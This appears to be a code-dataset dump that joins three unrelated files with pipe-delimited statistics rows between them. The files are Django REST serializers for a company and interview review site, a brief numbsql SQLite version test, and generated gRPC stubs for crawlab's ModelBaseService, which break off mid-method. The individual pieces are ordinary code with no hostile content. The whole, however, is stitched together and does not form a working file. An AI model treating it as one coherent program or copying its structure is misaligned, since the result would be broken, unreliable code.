        if data.get('offered_salary'):
            if data.get('offered_salary') > 50000000:  # 50 million toman
                raise serializers.ValidationError({'offered_salary': ['Max Salary in month is 50 million toman :(.']})
        if data.get('asked_salary'):
            if data.get('asked_salary') > 50000000:  # 50 million toman
                raise serializers.ValidationError({'asked_salary': ['Max Salary in month is 50 million toman :(.']})
        if data.get('pros') and len(data['pros']) > 20:
            raise serializers.ValidationError({'pros': ['Pros list must len 0, 20 item']})
        if data.get('cons') and len(data['cons']) > 20:
            raise serializers.ValidationError({'cons': ['Cons list must len 0, 20 item']})
        if data.get('interview_date') and date.today() < data['interview_date']:
            # BUG FIX: the error was previously keyed under 'start_date',
            # a field this serializer does not declare
            raise serializers.ValidationError({'interview_date': ['Interview date must be lower than today']})
        return data

    @transaction.atomic
    def create(self, validated_data):
        """Create an Interview, attach M2M pros/cons and fire notifications."""
        validated_data['company'] = Company.objects.get(company_slug=validated_data['company']['company_slug'])
        validated_data['creator'] = self.context['request'].user
        check_create_interview_permission(validated_data['creator'], validated_data['company'])
        # pull pros/cons out so the model constructor only sees scalar fields
        if validated_data.get('pros') is not None:
            pros_list = validated_data.pop('pros')
        else:
            pros_list = []
        if validated_data.get('cons') is not None:
            cons_list = validated_data.pop('cons')
        else:
            cons_list = []
        # drop a whitespace-only description entirely
        if validated_data.get('description') is not None and not validated_data['description'].split():
            validated_data.pop('description')
        validated_data['job'] = Job.objects.get(job_slug=validated_data['job']['job_slug'])
        validated_data['ip'] = utilities.get_client_ip(self.context['request'])
        # new interviews always start unapproved
        validated_data['approved'] = False
        interview = Interview(**validated_data)
        interview.save()
        for pros_data in pros_list:
            pros = Pros.objects.get(name=pros_data['name'])
            interview.pros.add(pros)
            pros.add_cons_priority()
        for cons_data in cons_list:
            cons = Cons.objects.get(name=cons_data['name'])
            interview.cons.add(cons)
            cons.add_cons_priority()
        validated_data['company'].handle_company_interview_statics()
        review_link = '{}/interview/{}'.format(settings.WEB_BASE_PATH, interview.pk)
        utilities.telegram_notify('New interview: on {}, \n by {} {}, \n link: {} {}'.format(interview.company.name,
                                                                                             interview.creator.first_name,
                                                                                             interview.creator.last_name,
                                                                                             review_link,
                                                                                             '#interview'),
                                  interview.id, 'interview', interview.title, interview.description,
                                  '{} {}'.format(interview.creator.first_name, interview.creator.last_name))
        return interview

    @transaction.atomic
    def update(self, instance, validated_data):
        """Partially update an Interview; pros/cons lists are replaced wholesale."""
        instance.status = validated_data.get('status', instance.status)
        instance.apply_method = validated_data.get('apply_method', instance.apply_method)
        instance.interviewer_rate = validated_data.get('interviewer_rate', instance.interviewer_rate)
        instance.total_rate = validated_data.get('total_rate', instance.total_rate)
        instance.interview_date = validated_data.get('interview_date', instance.interview_date)
        instance.response_time_before_review = validated_data.get('response_time_before_review',
                                                                  instance.response_time_before_review)
        instance.response_time_after_review = validated_data.get('response_time_after_review',
                                                                 instance.response_time_after_review)
        if validated_data.get('job') and instance.job.name != validated_data['job']['name']:
            instance.job = Job.objects.get(job_slug=validated_data['job']['job_slug'])
        if validated_data.get('asked_salary', None) is not None and validated_data['asked_salary'] != instance.asked_salary:
            instance.asked_salary = validated_data['asked_salary']
        if validated_data.get('offered_salary', None) is not None and validated_data['offered_salary'] != instance.offered_salary:
            instance.offered_salary = validated_data['offered_salary']
        instance.title = validated_data.get('title', instance.title)
        instance.description = validated_data.get('description', instance.description)
        if validated_data.get('pros'):
            instance.pros.clear()
            for pros_data in validated_data['pros']:
                pros = Pros.objects.get(name=pros_data['name'])
                instance.pros.add(pros)
                pros.add_cons_priority()
        if validated_data.get('cons'):
            instance.cons.clear()
            for cons_data in validated_data['cons']:
                cons = Cons.objects.get(name=cons_data['name'])
                instance.cons.add(cons)
                cons.add_cons_priority()
        instance.save()
        instance.company.handle_company_interview_statics()
        interview_link = '{}/interview/{}'.format(settings.WEB_BASE_PATH, instance.pk)
        utilities.telegram_notify('Interview update: on {}, \n by {} {}, \n link: {} {}'.format(instance.company.name,
                                                                                                instance.creator.first_name,
                                                                                                instance.creator.last_name,
                                                                                                interview_link,
                                                                                                '#update_interview'),
                                  instance.id, 'interview', instance.title, instance.description,
                                  '{} {}'.format(instance.creator.first_name, instance.creator.last_name))
        return instance

    def to_internal_value(self, data):
        """Ensure referenced Pros/Cons/Job rows exist before field validation."""
        for pros_data in data.get('pros') or []:
            name = pros_data['name'].strip()
            # get-or-create by name; an empty queryset is falsy
            if not Pros.objects.filter(name=name):
                Pros(name=name).save()
        for cons_data in data.get('cons') or []:
            name = cons_data['name'].strip()
            if not Cons.objects.filter(name=name):
                Cons(name=name).save()
        if data.get('job'):
            name = data['job']['name'].strip()
            # Slugify once: dash-join the word-ish tokens.  Raw string fixes
            # the invalid '\w' escape of the original non-raw literal.
            slug = '-'.join(re.findall(r'[\w-]+', name)).lower()
            job = Job.objects.filter(Q(name=name) | Q(job_slug=slug))
            if not job:
                job = Job(name=name, job_slug=slug)
                job.save()
            else:
                job = job[0]
            data['job']['job_slug'] = job.job_slug
        return super().to_internal_value(data)

    def to_representation(self, instance):
        """Attach computed display fields; salaries rendered in millions of toman."""
        instance.creator_data = {'name': instance.creator.username}
        # express salaries in millions of toman with one decimal
        instance.offered_salary = round(instance.offered_salary/100000)/10
        self.fields['offered_salary'] = serializers.FloatField()
        instance.asked_salary = round(instance.asked_salary/100000)/10
        self.fields['asked_salary'] = serializers.FloatField()
        instance.vote_count = instance.vote.count()
        instance.down_vote_count = instance.down_vote.count()
        instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
        # live view relation plus the denormalized historical counter
        instance.view_count = instance.view.count() + instance.total_view
        instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
        instance.my_review = instance.creator == self.context['request'].user
        instance.interview_date = instance.interview_date.strftime('%Y-%m') if instance.interview_date else 'نامشخص'
        instance.reply_created = instance.reply_created.strftime('%Y-%m-%d %H:%M') if instance.reply_created else None
        instance.total_review = instance.creator.profile.total_review
        instance.rate_avg = instance.creator.profile.rate_avg
        instance = super().to_representation(instance)
        return instance
class UserInterviewSerializer(serializers.Serializer):
    """Read-only detail representation of an interview for end users.

    Interviews flagged with a legal issue are redacted (title/description
    replaced, rates and salaries zeroed, pros/cons emptied).
    """
    id = serializers.ReadOnlyField()
    company = PublicUserCompanySerializer()
    job = PublicUserJobSerializer()
    pros = UserProsSerializer(many=True)
    cons = UserConsSerializer(many=True)
    status = serializers.ReadOnlyField()
    apply_method = serializers.ReadOnlyField()
    interviewer_rate = serializers.ReadOnlyField()
    total_rate = serializers.ReadOnlyField()
    title = serializers.ReadOnlyField()
    description = serializers.ReadOnlyField()
    asked_salary = serializers.ReadOnlyField()
    offered_salary = serializers.ReadOnlyField()
    vote_count = serializers.ReadOnlyField()
    down_vote_count = serializers.ReadOnlyField()
    vote_state = serializers.ReadOnlyField()
    view_count = serializers.ReadOnlyField()
    over_all_rate = serializers.ReadOnlyField()
    created = serializers.ReadOnlyField()
    my_review = serializers.ReadOnlyField()
    interview_date = serializers.ReadOnlyField()
    response_time_before_review = serializers.ReadOnlyField()
    response_time_after_review = serializers.ReadOnlyField()
    has_legal_issue = serializers.ReadOnlyField()
    reply = serializers.ReadOnlyField()
    reply_created = serializers.ReadOnlyField()
    total_review = serializers.ReadOnlyField()
    rate_avg = serializers.ReadOnlyField()

    def to_representation(self, instance):
        """Attach computed counters/flags, applying legal redaction."""
        instance.vote_count = instance.vote.count()
        instance.down_vote_count = instance.down_vote.count()
        instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
        # live view relation plus the denormalized historical counter
        instance.view_count = instance.view.count() + instance.total_view
        instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
        instance.my_review = instance.creator == self.context['request'].user
        instance.interview_date = instance.interview_date.strftime('%Y-%m-%d') if instance.interview_date else 'نامشخص'
        instance.reply_created = instance.reply_created.strftime('%Y-%m-%d %H:%M') if instance.reply_created else None
        if instance.description is None:
            instance.description = ''
        # (removed two no-op self-assignments of asked/offered salary)
        if instance.has_legal_issue:
            # redact content for interviews with a legal takedown
            is_deleted_text = settings.IS_DELETED_TEXT % instance.company.name
            instance.title = is_deleted_text
            instance.description = is_deleted_text
            instance.interviewer_rate = 0
            instance.total_rate = 0
            instance.asked_salary = 0
            instance.offered_salary = 0
        instance.total_review = instance.creator.profile.total_review
        instance.rate_avg = instance.creator.profile.rate_avg
        instance = super().to_representation(instance)
        # pros/cons are emptied post-serialization on redacted payloads
        if instance['has_legal_issue']:
            instance['pros'] = []
            instance['cons'] = []
        return instance
class UserInterviewListSerializer(serializers.Serializer):
    """Read-only list representation of interviews.

    Descriptions are stripped of HTML and truncated near 300 characters;
    legally-flagged interviews are redacted.
    """
    interviewer_rate = serializers.ReadOnlyField()
    total_rate = serializers.ReadOnlyField()
    id = serializers.ReadOnlyField()
    company = PublicUserCompanySerializer()
    job = PublicUserJobSerializer()
    # ratings
    title = serializers.ReadOnlyField()
    description = serializers.ReadOnlyField()
    vote_count = serializers.ReadOnlyField()
    down_vote_count = serializers.ReadOnlyField()
    vote_state = serializers.ReadOnlyField()
    view_count = serializers.ReadOnlyField()
    created = serializers.ReadOnlyField()
    my_review = serializers.ReadOnlyField()
    status = serializers.ReadOnlyField()
    approved = serializers.ReadOnlyField()
    has_legal_issue = serializers.ReadOnlyField()

    def to_representation(self, instance):
        """Attach computed counters and a truncated plain-text description."""
        instance.vote_count = instance.vote.count()
        instance.down_vote_count = instance.down_vote.count()
        instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
        # live view relation plus the denormalized historical counter
        instance.view_count = instance.view.count() + instance.total_view
        instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
        instance.my_review = instance.creator == self.context['request'].user
        if instance.has_legal_issue:
            # redact content for interviews with a legal takedown
            is_deleted_text = settings.IS_DELETED_TEXT % instance.company.name
            instance.title = is_deleted_text
            instance.description = is_deleted_text
            instance.interviewer_rate = 0
            instance.total_rate = 0
        else:
            if instance.description:
                # keep explicit line breaks, strip other HTML, then cut at a
                # word boundary within the first 300 characters
                instance.description = instance.description.replace('<br>', '<br>\n')
                soup = BeautifulSoup(instance.description, 'html.parser')
                body = soup.get_text()
                if len(body) > 300:
                    instance.description = ' '.join(body[:300].split(' ')[:-1]) + ' ...'
                else:
                    instance.description = body
            else:
                instance.description = ''
        instance = super().to_representation(instance)
        return instance
class UserHomeInterviewListSerializer(serializers.Serializer):
    """Home-page interview list serializer.

    ``instance`` is a plain dict (the accessed ``company__*`` keys match a
    ``.values()`` queryset row — confirm against the calling view), so all
    access is by key.
    """
    total_rate = serializers.ReadOnlyField()
    id = serializers.ReadOnlyField()
    company = PublicUserCompanySerializer()
    # ratings
    title = serializers.ReadOnlyField()
    description = serializers.ReadOnlyField()
    created = serializers.ReadOnlyField()
    approved = serializers.ReadOnlyField()
    has_legal_issue = serializers.ReadOnlyField()

    def to_representation(self, instance):
        """Reshape flat company__* keys into a nested dict and redact/truncate."""
        instance['company'] = {
            'name': instance['company__name'],
            'name_en': instance['company__name_en'],
            'company_slug': instance['company__company_slug'],
            'logo': instance['company__logo'],
        }
        instance['created'] = instance['created'].strftime('%Y-%m-%d %H:%M')
        # NOTE(review): 'my_review' is computed here but not declared as a
        # field on this serializer, so super().to_representation drops it
        instance['my_review'] = instance['creator'] == self.context['request'].user.id
        if instance['has_legal_issue']:
            # redact content for interviews with a legal takedown
            is_deleted_text = settings.IS_DELETED_TEXT % instance['company']['name']
            instance['title'] = is_deleted_text
            instance['description'] = is_deleted_text
            instance['total_rate'] = 0
        else:
            if instance['description']:
                # keep explicit line breaks, strip other HTML, then cut at a
                # word boundary within the first 300 characters
                instance['description'] = instance['description'].replace('<br>', '<br>\n')
                soup = BeautifulSoup(instance['description'], 'html.parser')
                body = soup.get_text()
                if len(body) > 300:
                    instance['description'] = ' '.join(body[:300].split(' ')[:-1]) + ' ...'
                else:
                    instance['description'] = body
            else:
                instance['description'] = ''
        instance = super().to_representation(instance)
        return instance
class ReviewSerializer(serializers.Serializer):
    """Minimal nested reference (id + title); reused below for both the
    ``review`` and ``interview`` relations of comment serializers."""
    id = serializers.IntegerField()
    title = serializers.ReadOnlyField()
class ReviewCommentSerializer(serializers.Serializer):
    """Create/update serializer for comments on company reviews."""
    id = serializers.ReadOnlyField()
    body = serializers.CharField(max_length=500)
    vote_state = serializers.ReadOnlyField()
    vote_count = serializers.ReadOnlyField()
    down_vote_count = serializers.ReadOnlyField()
    created = serializers.ReadOnlyField()
    review = ReviewSerializer()

    @transaction.atomic
    def create(self, validated_data):
        """Create a comment on an approved, non-deleted review.

        Raises a ValidationError when the target review does not exist.
        """
        try:
            validated_data['review'] = CompanyReview.objects.get(id=validated_data['review']['id'], is_deleted=False,
                                                                 approved=True)
        except CompanyReview.DoesNotExist:
            raise serializers.ValidationError({'review': ['review does not exist.']})
        validated_data['creator'] = self.context['request'].user
        check_create_review_comment_permission(validated_data['creator'], validated_data['review'])
        # BUG FIX: ip was previously assigned AFTER the model instance was
        # constructed, so it was never persisted.  Assumes ReviewComment has
        # an ip field like the other models here — TODO confirm.
        validated_data['ip'] = utilities.get_client_ip(self.context['request'])
        comment = ReviewComment(**validated_data)
        comment.save()
        return comment

    @transaction.atomic
    def update(self, instance, validated_data):
        """Update only the comment body."""
        instance.body = validated_data.get('body', instance.body)
        instance.save()
        return instance

    def to_representation(self, instance):
        """Attach vote counters/state and a formatted timestamp."""
        instance.vote_count = instance.vote.count()
        instance.down_vote_count = instance.down_vote.count()
        instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
        instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
        instance = super().to_representation(instance)
        return instance
class UserReviewCommentSerializer(serializers.Serializer):
    """Read-mostly representation of a review comment for end users."""
    id = serializers.ReadOnlyField()
    body = serializers.CharField(max_length=500)
    vote_state = serializers.ReadOnlyField()
    vote_count = serializers.ReadOnlyField()
    down_vote_count = serializers.ReadOnlyField()
    created = serializers.ReadOnlyField()

    def to_representation(self, instance):
        """Attach vote counters/state and a formatted timestamp, then serialize."""
        requester = self.context['request'].user
        instance.vote_count = instance.vote.count()
        instance.down_vote_count = instance.down_vote.count()
        instance.vote_state = utilities.check_vote_status(instance, requester)
        instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
        return super().to_representation(instance)
class InterviewCommentSerializer(serializers.Serializer):
    """Create/update serializer for comments on interviews."""
    id = serializers.ReadOnlyField()
    body = serializers.CharField(max_length=500)
    vote_state = serializers.ReadOnlyField()
    vote_count = serializers.ReadOnlyField()
    down_vote_count = serializers.ReadOnlyField()
    created = serializers.ReadOnlyField()
    interview = ReviewSerializer()

    @transaction.atomic
    def create(self, validated_data):
        """Create a comment on an approved, non-deleted interview.

        Raises a ValidationError when the target interview does not exist.
        """
        try:
            validated_data['interview'] = Interview.objects.get(id=validated_data['interview']['id'], is_deleted=False,
                                                                approved=True)
        except Interview.DoesNotExist:
            raise serializers.ValidationError({'interview': ['interview does not exist.']})
        validated_data['creator'] = self.context['request'].user
        check_create_interview_comment_permission(validated_data['creator'], validated_data['interview'])
        # BUG FIX: ip was previously assigned AFTER the model instance was
        # constructed, so it was never persisted.  Assumes InterviewComment
        # has an ip field like the other models here — TODO confirm.
        validated_data['ip'] = utilities.get_client_ip(self.context['request'])
        comment = InterviewComment(**validated_data)
        comment.save()
        return comment

    @transaction.atomic
    def update(self, instance, validated_data):
        """Update only the comment body."""
        instance.body = validated_data.get('body', instance.body)
        instance.save()
        return instance

    def to_representation(self, instance):
        """Attach vote counters/state and a formatted timestamp."""
        instance.vote_count = instance.vote.count()
        instance.down_vote_count = instance.down_vote.count()
        instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
        instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
        instance = super().to_representation(instance)
        return instance
class BotApproveReviewSerializer(serializers.Serializer):
    """Payload for the bot approval endpoint: target object id, a ``key``
    credential (presumably a shared secret checked by the view — confirm),
    and whether the target is a review or an interview."""
    id = serializers.IntegerField()
    key = serializers.CharField(max_length=100)
    type = serializers.ChoiceField(choices=(('review', 'review'), ('interview', 'interview')))
class ReplyCompanyReviewSerializer(serializers.Serializer):
    """Serializer used by a company to reply to one of its reviews.

    Everything is read-only except ``reply``; ``update`` stamps
    ``reply_created`` on the first reply only.
    """
    id = serializers.ReadOnlyField()
    company = PublicUserCompanySerializer(read_only=True)
    job = PublicUserJobSerializer(read_only=True)
    recommend_to_friend = serializers.ReadOnlyField()
    pros = ProsSerializer(many=True, read_only=True)
    cons = ConsSerializer(many=True, read_only=True)
    state = serializers.ReadOnlyField()
    # ratings
    work_life_balance = serializers.ReadOnlyField()
    salary_benefit = serializers.ReadOnlyField()
    security = serializers.ReadOnlyField()
    management = serializers.ReadOnlyField()
    culture = serializers.ReadOnlyField()
    title = serializers.ReadOnlyField()
    anonymous_job = serializers.ReadOnlyField()
    description = serializers.ReadOnlyField()
    salary = serializers.ReadOnlyField()
    salary_type = serializers.ReadOnlyField()
    start_date = serializers.ReadOnlyField()
    end_date = serializers.ReadOnlyField()
    current_work = serializers.ReadOnlyField()
    is_deleted = serializers.ReadOnlyField()
    has_legal_issue = serializers.ReadOnlyField()
    creator_data = serializers.ReadOnlyField()
    vote_count = serializers.ReadOnlyField()
    down_vote_count = serializers.ReadOnlyField()
    vote_state = serializers.ReadOnlyField()
    view_count = serializers.ReadOnlyField()
    over_all_rate = serializers.ReadOnlyField()
    approved = serializers.ReadOnlyField()
    created = serializers.ReadOnlyField()
    my_review = serializers.ReadOnlyField()
    reply = serializers.CharField(max_length=40000)
    reply_created = serializers.ReadOnlyField()
    total_review = serializers.ReadOnlyField()
    rate_avg = serializers.ReadOnlyField()

    def to_representation(self, instance):
        """Attach computed counters/flags, applying job anonymity."""
        # hide the real job from everyone except the review's author
        if self.context['request'].user != instance.creator and instance.anonymous_job:
            instance.job = Job(name='تخصص مخفی', job_slug='')
        instance.vote_count = instance.vote.count()
        instance.down_vote_count = instance.down_vote.count()
        instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
        # CONSISTENCY FIX: include the denormalized historical counter like
        # every other serializer in this module (was view.count() alone,
        # followed by a no-op total_view self-assignment)
        instance.view_count = instance.view.count() + instance.total_view
        instance.over_all_rate = round((instance.work_life_balance + instance.salary_benefit +
                                        instance.security + instance.management + instance.culture) / 5, 1)
        instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
        instance.my_review = instance.creator == self.context['request'].user
        instance.start_date = instance.start_date.strftime('%Y-%m-%d') if instance.start_date else 'نامشخص'
        instance.end_date = instance.end_date.strftime('%Y-%m-%d') if instance.end_date else 'نامشخص'
        if instance.description is None:
            instance.description = ''
        instance.comment_count = instance.reviewcomment_set.count()
        instance.salary = round(review_utilities.salary_handler(instance.salary, instance.salary_type, resp=True))
        instance.reply_created = instance.reply_created.strftime('%Y-%m-%d %H:%M') if instance.reply_created else None
        instance.total_review = instance.creator.profile.total_review
        instance.rate_avg = instance.creator.profile.rate_avg
        instance = super().to_representation(instance)
        return instance

    @transaction.atomic
    def update(self, instance, validated_data):
        """Store the company reply; set reply_created only the first time."""
        instance.reply = validated_data.get('reply', instance.reply)
        if not instance.reply_created:
            # NOTE(review): naive datetime — if USE_TZ is enabled this should
            # be django.utils.timezone.now(); confirm project settings
            instance.reply_created = datetime.now()
        instance.save()
        return instance
class ReplyInterviewSerializer(serializers.Serializer):
    """Serializer used by a company to reply to an interview review.

    Everything is read-only except ``reply``; ``update`` stamps
    ``reply_created`` on the first reply only.
    """
    id = serializers.ReadOnlyField()
    company = PublicUserCompanySerializer(read_only=True)
    job = PublicUserJobSerializer(read_only=True)
    pros = UserProsSerializer(many=True, read_only=True)
    cons = UserConsSerializer(many=True, read_only=True)
    status = serializers.ReadOnlyField()
    apply_method = serializers.ReadOnlyField()
    interviewer_rate = serializers.ReadOnlyField()
    total_rate = serializers.ReadOnlyField()
    title = serializers.ReadOnlyField()
    description = serializers.ReadOnlyField()
    asked_salary = serializers.ReadOnlyField()
    offered_salary = serializers.ReadOnlyField()
    vote_count = serializers.ReadOnlyField()
    down_vote_count = serializers.ReadOnlyField()
    vote_state = serializers.ReadOnlyField()
    view_count = serializers.ReadOnlyField()
    over_all_rate = serializers.ReadOnlyField()
    created = serializers.ReadOnlyField()
    my_review = serializers.ReadOnlyField()
    interview_date = serializers.ReadOnlyField()
    response_time_before_review = serializers.ReadOnlyField()
    response_time_after_review = serializers.ReadOnlyField()
    has_legal_issue = serializers.ReadOnlyField()
    reply = serializers.CharField(max_length=40000)
    reply_created = serializers.ReadOnlyField()
    total_review = serializers.ReadOnlyField()
    rate_avg = serializers.ReadOnlyField()

    def to_representation(self, instance):
        """Attach computed counters/flags and formatted timestamps."""
        instance.vote_count = instance.vote.count()
        instance.down_vote_count = instance.down_vote.count()
        instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
        # CONSISTENCY FIX: include the denormalized historical counter like
        # every other serializer in this module (was view.count() alone,
        # followed by a no-op total_view self-assignment)
        instance.view_count = instance.view.count() + instance.total_view
        instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
        instance.my_review = instance.creator == self.context['request'].user
        instance.interview_date = instance.interview_date.strftime('%Y-%m-%d') if instance.interview_date else 'نامشخص'
        if instance.description is None:
            instance.description = ''
        # (removed two no-op self-assignments of asked/offered salary)
        instance.reply_created = instance.reply_created.strftime('%Y-%m-%d %H:%M') if instance.reply_created else None
        instance.total_review = instance.creator.profile.total_review
        instance.rate_avg = instance.creator.profile.rate_avg
        instance = super().to_representation(instance)
        return instance

    @transaction.atomic
    def update(self, instance, validated_data):
        """Store the company reply; set reply_created only the first time."""
        instance.reply = validated_data.get('reply', instance.reply)
        if not instance.reply_created:
            # NOTE(review): naive datetime — if USE_TZ is enabled this should
            # be django.utils.timezone.now(); confirm project settings
            instance.reply_created = datetime.now()
        instance.save()
        return instance
| 50.273346
| 130
| 0.654767
| 5,274
| 51,681
| 6.217482
| 0.046644
| 0.152237
| 0.021957
| 0.018115
| 0.876338
| 0.844439
| 0.814827
| 0.79287
| 0.775304
| 0.768931
| 0
| 0.004868
| 0.236876
| 51,681
| 1,027
| 131
| 50.322298
| 0.826568
| 0.003986
| 0
| 0.788961
| 0
| 0
| 0.069549
| 0.001846
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040043
| false
| 0
| 0.016234
| 0
| 0.422078
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb5ac2555ebfc64ac1d1341eec4359bf7daf8152
| 166
|
py
|
Python
|
numbsql/tests/test_version.py
|
cpcloud/slumba
|
1efda94bcff28c682ee28a0ace8a8c6f711fc312
|
[
"Apache-2.0"
] | 19
|
2016-12-07T16:24:52.000Z
|
2021-08-31T02:25:49.000Z
|
numbsql/tests/test_version.py
|
cpcloud/numbsql
|
9fe03b40368a3557bab636afa4236f5c0bd4b7fa
|
[
"Apache-2.0"
] | 92
|
2021-09-04T11:39:57.000Z
|
2022-01-31T00:24:37.000Z
|
numbsql/tests/test_version.py
|
cpcloud/numbsql
|
9da75faca0b02b59b4bca8854a0efa6b3ca3bb98
|
[
"Apache-2.0"
] | 1
|
2019-12-06T22:06:33.000Z
|
2019-12-06T22:06:33.000Z
|
import sqlite3
from numbsql.sqlite import sqlite3_libversion
def test_version() -> None:
    """The SQLite version exposed by numbsql matches the stdlib sqlite3 build."""
    expected = sqlite3.sqlite_version.encode("ascii")
    assert sqlite3_libversion() == expected
| 20.75
| 73
| 0.777108
| 20
| 166
| 6.25
| 0.65
| 0.208
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027586
| 0.126506
| 166
| 7
| 74
| 23.714286
| 0.834483
| 0
| 0
| 0
| 0
| 0
| 0.03012
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cb87bc217152ad8ec20c85136821792a8e2a5ab4
| 19,234
|
py
|
Python
|
dist/python/services/model_base_service_pb2_grpc.py
|
crawlab-team/crawlab-grpc
|
be19dc86f20da4530b6741431bb83adeed8e4a79
|
[
"BSD-3-Clause"
] | null | null | null |
dist/python/services/model_base_service_pb2_grpc.py
|
crawlab-team/crawlab-grpc
|
be19dc86f20da4530b6741431bb83adeed8e4a79
|
[
"BSD-3-Clause"
] | 1
|
2021-11-09T15:32:13.000Z
|
2021-11-09T15:32:13.000Z
|
dist/python/services/model_base_service_pb2_grpc.py
|
crawlab-team/crawlab-grpc
|
be19dc86f20da4530b6741431bb83adeed8e4a79
|
[
"BSD-3-Clause"
] | 1
|
2021-09-22T01:29:24.000Z
|
2021-09-22T01:29:24.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from entity import request_pb2 as entity_dot_request__pb2
from entity import response_pb2 as entity_dot_response__pb2
class ModelBaseServiceStub(object):
    """Client-side stub for the grpc.ModelBaseService service.

    Generated by the gRPC Python protocol compiler plugin — DO NOT EDIT.
    Every RPC is unary-unary and shares the same entity Request/Response
    message pair.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # One callable per RPC; each serializes an entity Request and
        # deserializes an entity Response.
        self.GetById = channel.unary_unary(
                '/grpc.ModelBaseService/GetById',
                request_serializer=entity_dot_request__pb2.Request.SerializeToString,
                response_deserializer=entity_dot_response__pb2.Response.FromString,
                )
        self.Get = channel.unary_unary(
                '/grpc.ModelBaseService/Get',
                request_serializer=entity_dot_request__pb2.Request.SerializeToString,
                response_deserializer=entity_dot_response__pb2.Response.FromString,
                )
        self.GetList = channel.unary_unary(
                '/grpc.ModelBaseService/GetList',
                request_serializer=entity_dot_request__pb2.Request.SerializeToString,
                response_deserializer=entity_dot_response__pb2.Response.FromString,
                )
        self.DeleteById = channel.unary_unary(
                '/grpc.ModelBaseService/DeleteById',
                request_serializer=entity_dot_request__pb2.Request.SerializeToString,
                response_deserializer=entity_dot_response__pb2.Response.FromString,
                )
        self.Delete = channel.unary_unary(
                '/grpc.ModelBaseService/Delete',
                request_serializer=entity_dot_request__pb2.Request.SerializeToString,
                response_deserializer=entity_dot_response__pb2.Response.FromString,
                )
        self.DeleteList = channel.unary_unary(
                '/grpc.ModelBaseService/DeleteList',
                request_serializer=entity_dot_request__pb2.Request.SerializeToString,
                response_deserializer=entity_dot_response__pb2.Response.FromString,
                )
        self.ForceDeleteList = channel.unary_unary(
                '/grpc.ModelBaseService/ForceDeleteList',
                request_serializer=entity_dot_request__pb2.Request.SerializeToString,
                response_deserializer=entity_dot_response__pb2.Response.FromString,
                )
        self.UpdateById = channel.unary_unary(
                '/grpc.ModelBaseService/UpdateById',
                request_serializer=entity_dot_request__pb2.Request.SerializeToString,
                response_deserializer=entity_dot_response__pb2.Response.FromString,
                )
        self.Update = channel.unary_unary(
                '/grpc.ModelBaseService/Update',
                request_serializer=entity_dot_request__pb2.Request.SerializeToString,
                response_deserializer=entity_dot_response__pb2.Response.FromString,
                )
        self.UpdateDoc = channel.unary_unary(
                '/grpc.ModelBaseService/UpdateDoc',
                request_serializer=entity_dot_request__pb2.Request.SerializeToString,
                response_deserializer=entity_dot_response__pb2.Response.FromString,
                )
        self.Insert = channel.unary_unary(
                '/grpc.ModelBaseService/Insert',
                request_serializer=entity_dot_request__pb2.Request.SerializeToString,
                response_deserializer=entity_dot_response__pb2.Response.FromString,
                )
        self.Count = channel.unary_unary(
                '/grpc.ModelBaseService/Count',
                request_serializer=entity_dot_request__pb2.Request.SerializeToString,
                response_deserializer=entity_dot_response__pb2.Response.FromString,
                )
class ModelBaseServiceServicer(object):
    """Server-side interface for the grpc.ModelBaseService service.

    Generated by the gRPC Python protocol compiler plugin — DO NOT EDIT.
    Subclass and override the methods below; each default implementation
    reports UNIMPLEMENTED to the client.
    """

    def GetById(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Get(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetList(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DeleteById(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Delete(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def DeleteList(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def ForceDeleteList(self, request, context):
        """Missing associated documentation comment in .proto file."""
